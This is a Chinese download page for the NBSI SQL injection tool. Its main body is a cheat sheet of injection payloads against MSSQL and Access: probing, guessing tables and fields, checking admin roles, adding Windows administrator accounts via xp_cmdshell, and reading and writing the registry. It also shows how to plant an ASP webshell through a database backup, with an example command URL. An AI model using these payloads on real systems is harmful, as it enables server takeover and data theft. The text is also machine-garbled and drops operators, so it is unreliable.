标签:
NBSI注入网站漏洞扫描专用工具是一款功能齐全的APP,由vb语言撰写的网站漏洞检测专用工具的名字,ASP注入网站漏洞扫描专用工具,尤其在sql server注入检验层面有较高的准确度。
NBSI详细介绍1.分辨是不是有注入
;and 1=1
;and 1=2
2.分析判断是不是mssql
;and user0
3.分辨数据库系统软件
;and (select count(*) from sysobjects)0 mssql
;and (select count(*) from msysobjects)0 access
4.注入主要参数是标识符
and [查询条件] and =
5.检索时没过虑主要参数的
and [查询条件] and %=
6.猜数据库
;and (Select Count(*) from [数据库名])0
7.猜字段
;and (Select Count(字段名) from 数据库名)0
8.猜字段中纪录长短
;and (select top 1 len(字段名) from 数据库名)0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)0
10.检测管理权限构造(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER(sysadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(serveradmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(setupadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(securityadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(diskadmin));--
;and 1=(SELECT IS_SRVROLEMEMBER(bulkadmin));--
;and 1=(SELECT IS_MEMBER(db_owner));--
11.加上mssql和体系的账号
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,
username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin
username;--
;exec master.dbo.xp_cmdshell net user username
password /workstations:* /times:all
/passwordchg:yes /passwordreq:yes /active:yes /add
;--
;exec master.dbo.xp_cmdshell net user username
password /add;--
;exec master.dbo.xp_cmdshell net localgroup
administrators username /add;--
12.(1)解析xml文件目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree c:\
;and (select top 1 paths from dirs)0
;and (select top 1 paths from dirs where paths not
in(上步获得的paths)))
(2)解析xml文件目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 得到当今全部控制器
;insert into temp(id) exec master.dbo.xp_subdirs c:\;-- 得到根目录目录
;insert into temp(id,num1) exec master.dbo.xp_dirtree c:\;-- 得到全部根目录的文件目录树形结构
;insert into temp(id) exec master.dbo.xp_cmdshell type c:\web\index.asp;-- 查询文档的內容
13.mssql中的sql语句
xp_regenumvalues 注册表文件根键, 子键
;exec xp_regenumvalues HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Run 以好几个记录集方法回到全部键值
xp_regread 根键,子键,键值名
;exec xp_regread HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
CommonFilesDir 回到制订键的值
xp_regwrite 根键,子键, 值名, 值种类, 值
值种类有2种REG_SZ 表明字符型,REG_DWORD 表明整形
;exec xp_regwrite HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName,reg_sz,hello 载入注册表文件
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion,
TestValueName 删掉某一值
xp_regdeletekey HKEY_LOCAL_MACHINE,
SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey 退格键,包含该键下全部值
14.mssql的backup建立webshell
use model
create table cmd(str image);
insert into cmd(str) values (% Dim oScript %);
backup database model to disk=c:\l.asp;
15.mssql内嵌函数公式
;and (select @@version)0 得到Windows的版本信息
;and user_name()=dbo 分辨当今系统软件的联接客户是否sa
;and (select user_name())0 爆当今系统软件的联接客户
;and (select db_name())0 获得当今联接的数据库
16.简约的webshell
use model
create table cmd(str image);
insert into cmd(str) values (%=server.createobject(wscript.shell).exec(cmd.exe /c request(c)).stdout.readall%);
backup database model to disk=g:\wwwtest\l.asp;
要求的情况下,像这样子用:
http://ip/l.asp?c=dir
密码:www.itmop.com
加载全部内容
QQ电脑管家纯净版(QQguanjia)32MB160人在玩软件之家软件站为您提供QQ电脑管家纯净版(QQguanjia) 安卓版,手机版下载,QQ电脑管家纯净版(QQguanjia) apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载DSound.dll,Ddraw.dll,d3d8.dll修复工具 v1.074KB154人在玩DSound.dll,Ddraw.dll,d3d8.dll修复工具,可以检测是否有木马,对系统进行修复和保护。完美修复Dll文件、Dsound.dll、Ddraw.dll、D3d8.dll等,您可以免费下载。
下载dll一键修复工具离线版 Win7/Win10372MB99人在玩软件之家软件站为您提供dll一键修复工具离线版 Win7/Win10 安卓版,手机版下载,dll一键修复工具离线版 Win7/Win10 apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载360安全卫士免安装绿色版3.22MB89人在玩软件之家软件站为您提供360安全卫士免安装绿色版 安卓版,手机版下载,360安全卫士免安装绿色版 apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载WebCruiser v3.5.3中文版963KB86人在玩WebCruiser(网站漏洞扫描安装),WebCruiser一个小巧但功能不凡的Web应用漏洞扫描器,能够对整个网站进行漏洞扫描,并能够对发现的漏洞(SQL注入,跨站脚本)进行验证;它也可以单独进行漏洞验证,您可以免费下载。
下载小米电脑助手 v1.1.0.316官方版299.2M62人在玩小米电脑助手,小米电脑助手顾名思义是一款专为小米电脑打造的电脑管理软件,让小米电脑的设置管理更加便捷,提升大家的使用体验。软件拥有相当出色的功能,包括驱动管理、硬件信息、设备互联等,满足您的各种电脑管理需求,您可以免费下载。
下载诺顿360中文破解版120MB60人在玩软件之家软件站为您提供诺顿360中文破解版 安卓版,手机版下载,诺顿360中文破解版 apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载火绒安全弹窗拦截程序2.1M56人在玩火绒安全弹窗拦截程序,火绒安全弹窗拦截程序是一款功能实用的火绒弹窗拦截组件,可直接运行而不用安装。火绒弹窗拦截工具官方版支持自动支持自动检测和手动添加,按住定位拦截图标并拖动到需要拦截的弹窗上即可,您可以免费下载。
下载BackTrack5 r3中文版iso3.09MB55人在玩软件之家软件站为您提供BackTrack5 r3中文版iso 安卓版,手机版下载,BackTrack5 r3中文版iso apk免费下载安装到手机.同时支持便捷的电脑端一键安装功能!
下载火绒安全软件20.2M51人在玩火绒互联网安全软件,火绒互联网安全软件是一款由10余年经验资深工程师主导研发并拥有完全自主知识产权的反病毒引擎,是国内少有的自主研发并保持每周活跃更新的新一代反病毒引擎。火绒安全软件以精准威胁情报驱动的理念全新开发的新一代终端安全软件,下面小编就给大家详细介绍一下,感兴趣的话就赶快下载吧~
下载